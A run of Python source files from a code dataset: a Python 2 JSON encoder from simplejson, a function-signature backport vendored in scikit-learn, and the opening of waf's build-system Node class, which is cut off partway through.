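# '1.5'; floatstr(float('nan')) gives 'NaN'; floatstr(float('inf'),
# allow_nan=False) raises ValueError because the value is not JSON compliant.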
def encode_basestring(s):
"""
Return a JSON representation of a Python string
"""
def replace(match):
return ESCAPE_DCT[match.group(0)]
return '"' + ESCAPE.sub(replace, s) + '"'
def encode_basestring_ascii(s):
def replace(match):
s = match.group(0)
try:
return ESCAPE_DCT[s]
except KeyError:
n = ord(s)
if n < 0x10000:
return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
return '\\u%04x\\u%04x' % (s1, s2)
return '"' + str(ESCAPE_ASCII.sub(replace, s)) + '"'
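# Illustration (assumed input): encode_basestring_ascii(u'caf\xe9/') yields the
# quoted ASCII string "caf\u00e9\/" -- the non-ASCII character becomes a \uXXXX
# escape, '/' is escaped via ESCAPE_DCT to blunt </script> injection, and code
# points above 0xFFFF are emitted as surrogate pairs.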
try:
encode_basestring_ascii = _speedups.encode_basestring_ascii
_need_utf8 = True
except AttributeError:
_need_utf8 = False
class JSONEncoder(object):
"""
Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str, unicode | string |
+-------------------+---------------+
| int, long, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
    To extend this to recognize other objects, subclass and implement a
    ``.default()`` method that returns a serializable object for ``o`` if
    possible; otherwise it should call the superclass implementation
    (which raises ``TypeError``).
"""
__all__ = ['__init__', 'default', 'encode', 'iterencode']
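    # Extension sketch (hypothetical subclass, assumes `import decimal`; not
    # part of the original module):
    #     class DecimalEncoder(JSONEncoder):
    #         def default(self, o):
    #             if isinstance(o, decimal.Decimal):
    #                 return float(o)
    #             return JSONEncoder.default(self, o)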
item_separator = ', '
key_separator = ': '
def __init__(self, skipkeys=False, ensure_ascii=True,
check_circular=True, allow_nan=True, sort_keys=False,
indent=None, separators=None, encoding='utf-8'):
"""
Constructor for JSONEncoder, with sensible defaults.
If skipkeys is False, then it is a TypeError to attempt
encoding of keys that are not str, int, long, float or None. If
skipkeys is True, such items are simply skipped.
If ensure_ascii is True, the output is guaranteed to be str
objects with all incoming unicode characters escaped. If
ensure_ascii is false, the output will be unicode object.
If check_circular is True, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is True, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is True, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a non-negative integer, then JSON array
elements and object members will be pretty-printed with that
indent level. An indent level of 0 will only insert newlines.
None is the most compact representation.
If specified, separators should be a (item_separator, key_separator)
tuple. The default is (', ', ': '). To get the most compact JSON
representation you should specify (',', ':') to eliminate whitespace.
If encoding is not None, then all input strings will be
transformed into unicode using that encoding prior to JSON-encoding.
The default is UTF-8.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.indent = indent
self.current_indent_level = 0
if separators is not None:
self.item_separator, self.key_separator = separators
self.encoding = encoding
def _newline_indent(self):
return '\n' + (' ' * (self.indent * self.current_indent_level))
def _iterencode_list(self, lst, markers=None):
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
yield '['
if self.indent is not None:
self.current_indent_level += 1
newline_indent = self._newline_indent()
separator = self.item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
separator = self.item_separator
first = True
for value in lst:
if first:
first = False
else:
yield separator
for chunk in self._iterencode(value, markers):
yield chunk
if newline_indent is not None:
self.current_indent_level -= 1
yield self._newline_indent()
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(self, dct, markers=None):
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
key_separator = self.key_separator
if self.indent is not None:
self.current_indent_level += 1
newline_indent = self._newline_indent()
item_separator = self.item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = self.item_separator
first = True
if self.ensure_ascii:
encoder = encode_basestring_ascii
else:
encoder = encode_basestring
allow_nan = self.allow_nan
if self.sort_keys:
keys = dct.keys()
keys.sort()
items = [(k, dct[k]) for k in keys]
else:
items = dct.iteritems()
_encoding = self.encoding
_do_decode = (_encoding is not None
and not (_need_utf8 and _encoding == 'utf-8'))
for key, value in items:
if isinstance(key, str):
if _do_decode:
key = key.decode(_encoding)
elif isinstance(key, basestring):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
key = floatstr(key, allow_nan)
elif isinstance(key, (int, long)):
key = str(key)
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif self.skipkeys:
continue
else:
raise TypeError("key %r is not a string" % (key,))
if first:
first = False
else:
yield item_separator
yield encoder(key)
yield key_separator
for chunk in self._iterencode(value, markers):
yield chunk
if newline_indent is not None:
self.current_indent_level -= 1
yield self._newline_indent()
yield '}'
if markers is not None:
del markers[markerid]
def _iterencode(self, o, markers=None):
if isinstance(o, basestring):
if self.ensure_ascii:
encoder = encode_basestring_ascii
else:
encoder = encode_basestring
_encoding = self.encoding
if (_encoding is not None and isinstance(o, str)
and not (_need_utf8 and _encoding == 'utf-8')):
o = o.decode(_encoding)
yield encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, (int, long)):
yield str(o)
elif isinstance(o, float):
yield floatstr(o, self.allow_nan)
elif isinstance(o, (list, tuple)):
for chunk in self._iterencode_list(o, markers):
yield chunk
elif isinstance(o, dict):
for chunk in self._iterencode_dict(o, markers):
yield chunk
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
for chunk in self._iterencode_default(o, markers):
yield chunk
if markers is not None:
del markers[markerid]
def _iterencode_default(self, o, markers=None):
newobj = self.default(o)
return self._iterencode(newobj, markers)
def default(self, o):
"""
Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
return JSONEncoder.default(self, o)
"""
raise TypeError("%r is not JSON serializable" % (o,))
def encode(self, o):
"""
Return a JSON string representation of a Python data structure.
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo":["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks...
if isinstance(o, basestring):
if isinstance(o, str):
_encoding = self.encoding
if (_encoding is not None
and not (_encoding == 'utf-8' and _need_utf8)):
o = o.decode(_encoding)
return encode_basestring_ascii(o)
# This doesn't pass the iterator directly to ''.join() because it
# sucks at reporting exceptions. It's going to do this internally
# anyway because it uses PySequence_Fast or similar.
chunks = list(self.iterencode(o))
return ''.join(chunks)
def iterencode(self, o):
"""
Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
return self._iterencode(o, markers)
__all__ = ['JSONEncoder']
| apache-2.0 |
moutai/scikit-learn | sklearn/externals/funcsigs.py | 118 | 29982 | # Copyright 2001-2013 Python Software Foundation; All Rights Reserved
"""Function signature objects for callables
Back port of Python 3.3's function signature tools from the inspect module,
modified to be compatible with Python 2.6, 2.7 and 3.2+.
"""
from __future__ import absolute_import, division, print_function
import itertools
import functools
import re
import types
try:
from collections import OrderedDict
except ImportError:
from .odict import OrderedDict
__version__ = "0.4"
__all__ = ['BoundArguments', 'Parameter', 'Signature', 'signature']
_WrapperDescriptor = type(type.__call__)
_MethodWrapper = type(all.__call__)
_NonUserDefinedCallables = (_WrapperDescriptor,
_MethodWrapper,
types.BuiltinFunctionType)
def formatannotation(annotation, base_module=None):
if isinstance(annotation, type):
if annotation.__module__ in ('builtins', '__builtin__', base_module):
return annotation.__name__
return annotation.__module__+'.'+annotation.__name__
return repr(annotation)
def _get_user_defined_method(cls, method_name, *nested):
try:
if cls is type:
return
meth = getattr(cls, method_name)
for name in nested:
meth = getattr(meth, name, meth)
except AttributeError:
return
else:
if not isinstance(meth, _NonUserDefinedCallables):
# Once '__signature__' will be added to 'C'-level
# callables, this check won't be necessary
return meth
def signature(obj):
'''Get a signature object for the passed callable.'''
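    # Usage sketch (editorial comment; ``greet`` is a made-up example):
    #
    #     def greet(name, punctuation='!'):
    #         return name + punctuation
    #
    #     str(signature(greet))  # -> "(name, punctuation='!')"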
if not callable(obj):
raise TypeError('{0!r} is not a callable object'.format(obj))
if isinstance(obj, types.MethodType):
sig = signature(obj.__func__)
if obj.__self__ is None:
# Unbound method: the first parameter becomes positional-only
if sig.parameters:
first = sig.parameters.values()[0].replace(
kind=_POSITIONAL_ONLY)
return sig.replace(
parameters=(first,) + tuple(sig.parameters.values())[1:])
else:
return sig
else:
# In this case we skip the first parameter of the underlying
# function (usually `self` or `cls`).
return sig.replace(parameters=tuple(sig.parameters.values())[1:])
try:
sig = obj.__signature__
except AttributeError:
pass
else:
if sig is not None:
return sig
try:
# Was this function wrapped by a decorator?
wrapped = obj.__wrapped__
except AttributeError:
pass
else:
return signature(wrapped)
if isinstance(obj, types.FunctionType):
return Signature.from_function(obj)
if isinstance(obj, functools.partial):
sig = signature(obj.func)
new_params = OrderedDict(sig.parameters.items())
partial_args = obj.args or ()
partial_keywords = obj.keywords or {}
try:
ba = sig.bind_partial(*partial_args, **partial_keywords)
except TypeError as ex:
msg = 'partial object {0!r} has incorrect arguments'.format(obj)
raise ValueError(msg)
for arg_name, arg_value in ba.arguments.items():
param = new_params[arg_name]
if arg_name in partial_keywords:
# We set a new default value, because the following code
# is correct:
#
# >>> def foo(a): print(a)
# >>> print(partial(partial(foo, a=10), a=20)())
# 20
# >>> print(partial(partial(foo, a=10), a=20)(a=30))
# 30
#
# So, with 'partial' objects, passing a keyword argument is
# like setting a new default value for the corresponding
# parameter
#
# We also mark this parameter with '_partial_kwarg'
# flag. Later, in '_bind', the 'default' value of this
# parameter will be added to 'kwargs', to simulate
# the 'functools.partial' real call.
new_params[arg_name] = param.replace(default=arg_value,
_partial_kwarg=True)
elif (param.kind not in (_VAR_KEYWORD, _VAR_POSITIONAL) and
not param._partial_kwarg):
new_params.pop(arg_name)
return sig.replace(parameters=new_params.values())
sig = None
if isinstance(obj, type):
# obj is a class or a metaclass
# First, let's see if it has an overloaded __call__ defined
# in its metaclass
call = _get_user_defined_method(type(obj), '__call__')
if call is not None:
sig = signature(call)
else:
# Now we check if the 'obj' class has a '__new__' method
new = _get_user_defined_method(obj, '__new__')
if new is not None:
sig = signature(new)
else:
# Finally, we should have at least __init__ implemented
init = _get_user_defined_method(obj, '__init__')
if init is not None:
sig = signature(init)
elif not isinstance(obj, _NonUserDefinedCallables):
# An object with __call__
# We also check that the 'obj' is not an instance of
# _WrapperDescriptor or _MethodWrapper to avoid
# infinite recursion (and even potential segfault)
call = _get_user_defined_method(type(obj), '__call__', 'im_func')
if call is not None:
sig = signature(call)
if sig is not None:
# For classes and objects we skip the first parameter of their
# __call__, __new__, or __init__ methods
return sig.replace(parameters=tuple(sig.parameters.values())[1:])
if isinstance(obj, types.BuiltinFunctionType):
# Raise a nicer error message for builtins
msg = 'no signature found for builtin function {0!r}'.format(obj)
raise ValueError(msg)
raise ValueError('callable {0!r} is not supported by signature'.format(obj))
class _void(object):
'''A private marker - used in Parameter & Signature'''
class _empty(object):
pass
class _ParameterKind(int):
def __new__(self, *args, **kwargs):
obj = int.__new__(self, *args)
obj._name = kwargs['name']
return obj
def __str__(self):
return self._name
def __repr__(self):
return '<_ParameterKind: {0!r}>'.format(self._name)
_POSITIONAL_ONLY = _ParameterKind(0, name='POSITIONAL_ONLY')
_POSITIONAL_OR_KEYWORD = _ParameterKind(1, name='POSITIONAL_OR_KEYWORD')
_VAR_POSITIONAL = _ParameterKind(2, name='VAR_POSITIONAL')
_KEYWORD_ONLY = _ParameterKind(3, name='KEYWORD_ONLY')
_VAR_KEYWORD = _ParameterKind(4, name='VAR_KEYWORD')
class Parameter(object):
'''Represents a parameter in a function signature.
Has the following public attributes:
* name : str
The name of the parameter as a string.
* default : object
The default value for the parameter if specified. If the
parameter has no default value, this attribute is not set.
* annotation
The annotation for the parameter if specified. If the
parameter has no annotation, this attribute is not set.
* kind : str
Describes how argument values are bound to the parameter.
Possible values: `Parameter.POSITIONAL_ONLY`,
`Parameter.POSITIONAL_OR_KEYWORD`, `Parameter.VAR_POSITIONAL`,
`Parameter.KEYWORD_ONLY`, `Parameter.VAR_KEYWORD`.
'''
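    # Illustration (editorial comment, not part of the backport):
    #
    #     p = Parameter('x', Parameter.POSITIONAL_OR_KEYWORD, default=0)
    #     str(p)   # -> 'x=0'
    #     p.replace(default=1).default   # -> 1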
__slots__ = ('_name', '_kind', '_default', '_annotation', '_partial_kwarg')
POSITIONAL_ONLY = _POSITIONAL_ONLY
POSITIONAL_OR_KEYWORD = _POSITIONAL_OR_KEYWORD
VAR_POSITIONAL = _VAR_POSITIONAL
KEYWORD_ONLY = _KEYWORD_ONLY
VAR_KEYWORD = _VAR_KEYWORD
empty = _empty
def __init__(self, name, kind, default=_empty, annotation=_empty,
_partial_kwarg=False):
if kind not in (_POSITIONAL_ONLY, _POSITIONAL_OR_KEYWORD,
_VAR_POSITIONAL, _KEYWORD_ONLY, _VAR_KEYWORD):
raise ValueError("invalid value for 'Parameter.kind' attribute")
self._kind = kind
if default is not _empty:
if kind in (_VAR_POSITIONAL, _VAR_KEYWORD):
msg = '{0} parameters cannot have default values'.format(kind)
raise ValueError(msg)
self._default = default
self._annotation = annotation
if name is None:
if kind != _POSITIONAL_ONLY:
raise ValueError("None is not a valid name for a "
"non-positional-only parameter")
self._name = name
else:
name = str(name)
if kind != _POSITIONAL_ONLY and not re.match(r'[a-z_]\w*$', name, re.I):
msg = '{0!r} is not a valid parameter name'.format(name)
raise ValueError(msg)
self._name = name
self._partial_kwarg = _partial_kwarg
@property
def name(self):
return self._name
@property
def default(self):
return self._default
@property
def annotation(self):
return self._annotation
@property
def kind(self):
return self._kind
def replace(self, name=_void, kind=_void, annotation=_void,
default=_void, _partial_kwarg=_void):
'''Creates a customized copy of the Parameter.'''
if name is _void:
name = self._name
if kind is _void:
kind = self._kind
if annotation is _void:
annotation = self._annotation
if default is _void:
default = self._default
if _partial_kwarg is _void:
_partial_kwarg = self._partial_kwarg
return type(self)(name, kind, default=default, annotation=annotation,
_partial_kwarg=_partial_kwarg)
def __str__(self):
kind = self.kind
formatted = self._name
if kind == _POSITIONAL_ONLY:
if formatted is None:
formatted = ''
formatted = '<{0}>'.format(formatted)
# Add annotation and default value
if self._annotation is not _empty:
formatted = '{0}:{1}'.format(formatted,
formatannotation(self._annotation))
if self._default is not _empty:
formatted = '{0}={1}'.format(formatted, repr(self._default))
if kind == _VAR_POSITIONAL:
formatted = '*' + formatted
elif kind == _VAR_KEYWORD:
formatted = '**' + formatted
return formatted
def __repr__(self):
return '<{0} at {1:#x} {2!r}>'.format(self.__class__.__name__,
id(self), self.name)
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
return (issubclass(other.__class__, Parameter) and
self._name == other._name and
self._kind == other._kind and
self._default == other._default and
self._annotation == other._annotation)
def __ne__(self, other):
return not self.__eq__(other)
class BoundArguments(object):
'''Result of `Signature.bind` call. Holds the mapping of arguments
to the function's parameters.
Has the following public attributes:
* arguments : OrderedDict
An ordered mutable mapping of parameters' names to arguments' values.
Does not contain arguments' default values.
* signature : Signature
The Signature object that created this instance.
* args : tuple
Tuple of positional arguments values.
* kwargs : dict
Dict of keyword arguments values.
'''
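    # Sketch of typical use (editorial comment; ``f`` is illustrative only):
    #
    #     def f(a, b=10, **extra):
    #         pass
    #
    #     ba = signature(f).bind(1, c=3)
    #     ba.args     # -> (1,)
    #     ba.kwargs   # -> {'c': 3}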
def __init__(self, signature, arguments):
self.arguments = arguments
self._signature = signature
@property
def signature(self):
return self._signature
@property
def args(self):
args = []
for param_name, param in self._signature.parameters.items():
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
# Keyword arguments mapped by 'functools.partial'
# (Parameter._partial_kwarg is True) are mapped
# in 'BoundArguments.kwargs', along with VAR_KEYWORD &
# KEYWORD_ONLY
break
try:
arg = self.arguments[param_name]
except KeyError:
# We're done here. Other arguments
# will be mapped in 'BoundArguments.kwargs'
break
else:
if param.kind == _VAR_POSITIONAL:
# *args
args.extend(arg)
else:
# plain argument
args.append(arg)
return tuple(args)
@property
def kwargs(self):
kwargs = {}
kwargs_started = False
for param_name, param in self._signature.parameters.items():
if not kwargs_started:
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
kwargs_started = True
else:
if param_name not in self.arguments:
kwargs_started = True
continue
if not kwargs_started:
continue
try:
arg = self.arguments[param_name]
except KeyError:
pass
else:
if param.kind == _VAR_KEYWORD:
# **kwargs
kwargs.update(arg)
else:
# plain keyword argument
kwargs[param_name] = arg
return kwargs
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
return (issubclass(other.__class__, BoundArguments) and
self.signature == other.signature and
self.arguments == other.arguments)
def __ne__(self, other):
return not self.__eq__(other)
class Signature(object):
'''A Signature object represents the overall signature of a function.
It stores a Parameter object for each parameter accepted by the
function, as well as information specific to the function itself.
A Signature object has the following public attributes and methods:
* parameters : OrderedDict
An ordered mapping of parameters' names to the corresponding
Parameter objects (keyword-only arguments are in the same order
as listed in `code.co_varnames`).
* return_annotation : object
The annotation for the return type of the function if specified.
If the function has no annotation for its return type, this
attribute is not set.
* bind(*args, **kwargs) -> BoundArguments
Creates a mapping from positional and keyword arguments to
parameters.
* bind_partial(*args, **kwargs) -> BoundArguments
Creates a partial mapping from positional and keyword arguments
to parameters (simulating 'functools.partial' behavior.)
'''
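    # Illustrative usage (editorial comment; ``download`` is hypothetical):
    #
    #     def download(url, timeout=30, *args):
    #         pass
    #
    #     sig = signature(download)
    #     str(sig)   # -> "(url, timeout=30, *args)"
    #     sig.bind('http://x').arguments   # -> OrderedDict([('url', 'http://x')])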
__slots__ = ('_return_annotation', '_parameters')
_parameter_cls = Parameter
_bound_arguments_cls = BoundArguments
empty = _empty
def __init__(self, parameters=None, return_annotation=_empty,
__validate_parameters__=True):
'''Constructs Signature from the given list of Parameter
objects and 'return_annotation'. All arguments are optional.
'''
if parameters is None:
params = OrderedDict()
else:
if __validate_parameters__:
params = OrderedDict()
top_kind = _POSITIONAL_ONLY
for idx, param in enumerate(parameters):
kind = param.kind
if kind < top_kind:
msg = 'wrong parameter order: {0} before {1}'
msg = msg.format(top_kind, param.kind)
raise ValueError(msg)
else:
top_kind = kind
name = param.name
if name is None:
name = str(idx)
param = param.replace(name=name)
if name in params:
msg = 'duplicate parameter name: {0!r}'.format(name)
raise ValueError(msg)
params[name] = param
else:
params = OrderedDict(((param.name, param)
for param in parameters))
self._parameters = params
self._return_annotation = return_annotation
@classmethod
def from_function(cls, func):
'''Constructs Signature for the given python function'''
if not isinstance(func, types.FunctionType):
raise TypeError('{0!r} is not a Python function'.format(func))
Parameter = cls._parameter_cls
# Parameter information.
func_code = func.__code__
pos_count = func_code.co_argcount
arg_names = func_code.co_varnames
positional = tuple(arg_names[:pos_count])
keyword_only_count = getattr(func_code, 'co_kwonlyargcount', 0)
keyword_only = arg_names[pos_count:(pos_count + keyword_only_count)]
annotations = getattr(func, '__annotations__', {})
defaults = func.__defaults__
kwdefaults = getattr(func, '__kwdefaults__', None)
if defaults:
pos_default_count = len(defaults)
else:
pos_default_count = 0
parameters = []
# Non-keyword-only parameters w/o defaults.
non_default_count = pos_count - pos_default_count
for name in positional[:non_default_count]:
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD))
# ... w/ defaults.
for offset, name in enumerate(positional[non_default_count:]):
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD,
default=defaults[offset]))
# *args
if func_code.co_flags & 0x04:
name = arg_names[pos_count + keyword_only_count]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_POSITIONAL))
# Keyword-only parameters.
for name in keyword_only:
default = _empty
if kwdefaults is not None:
default = kwdefaults.get(name, _empty)
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_KEYWORD_ONLY,
default=default))
# **kwargs
if func_code.co_flags & 0x08:
index = pos_count + keyword_only_count
if func_code.co_flags & 0x04:
index += 1
name = arg_names[index]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_KEYWORD))
return cls(parameters,
return_annotation=annotations.get('return', _empty),
__validate_parameters__=False)
@property
def parameters(self):
try:
return types.MappingProxyType(self._parameters)
except AttributeError:
return OrderedDict(self._parameters.items())
@property
def return_annotation(self):
return self._return_annotation
def replace(self, parameters=_void, return_annotation=_void):
'''Creates a customized copy of the Signature.
Pass 'parameters' and/or 'return_annotation' arguments
to override them in the new copy.
'''
if parameters is _void:
parameters = self.parameters.values()
if return_annotation is _void:
return_annotation = self._return_annotation
return type(self)(parameters,
return_annotation=return_annotation)
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
if (not issubclass(type(other), Signature) or
self.return_annotation != other.return_annotation or
len(self.parameters) != len(other.parameters)):
return False
other_positions = dict((param, idx)
for idx, param in enumerate(other.parameters.keys()))
for idx, (param_name, param) in enumerate(self.parameters.items()):
if param.kind == _KEYWORD_ONLY:
try:
other_param = other.parameters[param_name]
except KeyError:
return False
else:
if param != other_param:
return False
else:
try:
other_idx = other_positions[param_name]
except KeyError:
return False
else:
if (idx != other_idx or
param != other.parameters[param_name]):
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def _bind(self, args, kwargs, partial=False):
'''Private method. Don't use directly.'''
arguments = OrderedDict()
parameters = iter(self.parameters.values())
parameters_ex = ()
arg_vals = iter(args)
if partial:
# Support for binding arguments to 'functools.partial' objects.
# See 'functools.partial' case in 'signature()' implementation
# for details.
for param_name, param in self.parameters.items():
if (param._partial_kwarg and param_name not in kwargs):
# Simulating 'functools.partial' behavior
kwargs[param_name] = param.default
while True:
# Let's iterate through the positional arguments and corresponding
# parameters
try:
arg_val = next(arg_vals)
except StopIteration:
# No more positional arguments
try:
param = next(parameters)
except StopIteration:
# No more parameters. That's it. Just need to check that
# we have no `kwargs` after this while loop
break
else:
if param.kind == _VAR_POSITIONAL:
# That's OK, just empty *args. Let's start parsing
# kwargs
break
elif param.name in kwargs:
if param.kind == _POSITIONAL_ONLY:
msg = '{arg!r} parameter is positional only, ' \
'but was passed as a keyword'
msg = msg.format(arg=param.name)
raise TypeError(msg)
parameters_ex = (param,)
break
elif (param.kind == _VAR_KEYWORD or
param.default is not _empty):
# That's fine too - we have a default value for this
# parameter. So, lets start parsing `kwargs`, starting
# with the current parameter
parameters_ex = (param,)
break
else:
if partial:
parameters_ex = (param,)
break
else:
msg = '{arg!r} parameter lacking default value'
msg = msg.format(arg=param.name)
raise TypeError(msg)
else:
# We have a positional argument to process
try:
param = next(parameters)
except StopIteration:
raise TypeError('too many positional arguments')
else:
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
# Looks like we have no parameter for this positional
# argument
raise TypeError('too many positional arguments')
if param.kind == _VAR_POSITIONAL:
# We have an '*args'-like argument, let's fill it with
# all positional arguments we have left and move on to
# the next phase
values = [arg_val]
values.extend(arg_vals)
arguments[param.name] = tuple(values)
break
if param.name in kwargs:
raise TypeError('multiple values for argument '
'{arg!r}'.format(arg=param.name))
arguments[param.name] = arg_val
# Now, we iterate through the remaining parameters to process
# keyword arguments
kwargs_param = None
for param in itertools.chain(parameters_ex, parameters):
if param.kind == _POSITIONAL_ONLY:
# This should never happen in case of a properly built
# Signature object (but let's have this check here
# to ensure correct behaviour just in case)
raise TypeError('{arg!r} parameter is positional only, '
'but was passed as a keyword'. \
format(arg=param.name))
if param.kind == _VAR_KEYWORD:
# Memorize that we have a '**kwargs'-like parameter
kwargs_param = param
continue
param_name = param.name
try:
arg_val = kwargs.pop(param_name)
except KeyError:
# We have no value for this parameter. It's fine though,
# if it has a default value, or it is an '*args'-like
# parameter, left alone by the processing of positional
# arguments.
if (not partial and param.kind != _VAR_POSITIONAL and
param.default is _empty):
raise TypeError('{arg!r} parameter lacking default value'. \
format(arg=param_name))
else:
arguments[param_name] = arg_val
if kwargs:
if kwargs_param is not None:
# Process our '**kwargs'-like parameter
arguments[kwargs_param.name] = kwargs
else:
raise TypeError('too many keyword arguments')
return self._bound_arguments_cls(self, arguments)
def bind(self, *args, **kwargs):
        '''Get a BoundArguments object that maps the passed `args`
        and `kwargs` to the function's signature. Raises `TypeError`
        if the passed arguments cannot be bound.
'''
return self._bind(args, kwargs)
def bind_partial(self, *args, **kwargs):
        '''Get a BoundArguments object that partially maps the
        passed `args` and `kwargs` to the function's signature.
        Raises `TypeError` if the passed arguments cannot be bound.
'''
return self._bind(args, kwargs, partial=True)
def __str__(self):
result = []
render_kw_only_separator = True
for idx, param in enumerate(self.parameters.values()):
formatted = str(param)
kind = param.kind
if kind == _VAR_POSITIONAL:
# OK, we have an '*args'-like parameter, so we won't need
# a '*' to separate keyword-only arguments
render_kw_only_separator = False
elif kind == _KEYWORD_ONLY and render_kw_only_separator:
# We have a keyword-only parameter to render and we haven't
# rendered an '*args'-like parameter before, so add a '*'
# separator to the parameters list ("foo(arg1, *, arg2)" case)
result.append('*')
# This condition should be only triggered once, so
# reset the flag
render_kw_only_separator = False
result.append(formatted)
rendered = '({0})'.format(', '.join(result))
if self.return_annotation is not _empty:
anno = formatannotation(self.return_annotation)
rendered += ' -> {0}'.format(anno)
return rendered
| bsd-3-clause |
Cactuslegs/audacity-of-nope | lib-src/lv2/sord/waflib/Node.py | 62 | 10698 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os,re,sys,shutil
from waflib import Utils,Errors
exclude_regs='''
**/*~
**/#*#
**/.#*
**/%*%
**/._*
**/CVS
**/CVS/**
**/.cvsignore
**/SCCS
**/SCCS/**
**/vssver.scc
**/.svn
**/.svn/**
**/BitKeeper
**/.git
**/.git/**
**/.gitignore
**/.bzr
**/.bzrignore
**/.bzr/**
**/.hg
**/.hg/**
**/_MTN
**/_MTN/**
**/.arch-ids
**/{arch}
**/_darcs
**/_darcs/**
**/.DS_Store'''
def split_path(path):
return path.split('/')
def split_path_cygwin(path):
if path.startswith('//'):
ret=path.split('/')[2:]
ret[0]='/'+ret[0]
return ret
return path.split('/')
re_sp=re.compile('[/\\\\]')
def split_path_win32(path):
if path.startswith('\\\\'):
ret=re.split(re_sp,path)[2:]
ret[0]='\\'+ret[0]
return ret
return re.split(re_sp,path)
if sys.platform=='cygwin':
split_path=split_path_cygwin
elif Utils.is_win32:
split_path=split_path_win32
class Node(object):
__slots__=('name','sig','children','parent','cache_abspath','cache_isdir','cache_sig')
def __init__(self,name,parent):
self.name=name
self.parent=parent
if parent:
if name in parent.children:
raise Errors.WafError('node %s exists in the parent files %r already'%(name,parent))
parent.children[name]=self
def __setstate__(self,data):
self.name=data[0]
self.parent=data[1]
if data[2]is not None:
self.children=data[2]
if data[3]is not None:
self.sig=data[3]
def __getstate__(self):
return(self.name,self.parent,getattr(self,'children',None),getattr(self,'sig',None))
def __str__(self):
return self.name
def __repr__(self):
return self.abspath()
def __hash__(self):
return id(self)
def __eq__(self,node):
return id(self)==id(node)
def __copy__(self):
raise Errors.WafError('nodes are not supposed to be copied')
def read(self,flags='r',encoding='ISO8859-1'):
return Utils.readf(self.abspath(),flags,encoding)
def write(self,data,flags='w',encoding='ISO8859-1'):
Utils.writef(self.abspath(),data,flags,encoding)
def chmod(self,val):
os.chmod(self.abspath(),val)
def delete(self):
try:
if getattr(self,'children',None):
shutil.rmtree(self.abspath())
else:
os.unlink(self.abspath())
except OSError:
pass
self.evict()
def evict(self):
del self.parent.children[self.name]
def suffix(self):
k=max(0,self.name.rfind('.'))
return self.name[k:]
def height(self):
d=self
val=-1
while d:
d=d.parent
val+=1
return val
def listdir(self):
lst=Utils.listdir(self.abspath())
lst.sort()
return lst
def mkdir(self):
if getattr(self,'cache_isdir',None):
return
try:
self.parent.mkdir()
except OSError:
pass
if self.name:
try:
os.makedirs(self.abspath())
except OSError:
pass
if not os.path.isdir(self.abspath()):
raise Errors.WafError('Could not create the directory %s'%self.abspath())
try:
self.children
except AttributeError:
self.children={}
self.cache_isdir=True
def find_node(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
cur=self
for x in lst:
if x=='..':
cur=cur.parent or cur
continue
try:
ch=cur.children
except AttributeError:
cur.children={}
else:
try:
cur=cur.children[x]
continue
except KeyError:
pass
cur=self.__class__(x,cur)
try:
